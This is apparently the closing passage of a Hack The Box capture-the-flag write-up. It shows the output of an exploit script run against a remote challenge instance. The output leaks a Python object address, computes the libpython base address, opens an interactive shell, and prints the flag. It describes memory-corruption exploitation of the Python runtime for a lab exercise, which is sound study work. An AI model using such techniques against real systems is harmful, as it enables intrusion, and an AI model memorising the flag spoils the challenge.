Let’s get the flag on the remote instance:
$ python3 solve.py 157.245.41.35:30659
[*] './libpython3.11.so.1.0'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 157.245.41.35 on port 30659: Done
[*] id(0) = 0x7f25a2590288
[+] Python base address: 0x7f25a206c000
[*] Switching to interactive mode
$ cat flag.txt
HTB{f4k3_0bj3ct5_4r3_p0w3rfu11}
The full exploit script can be found in here: solve.py
.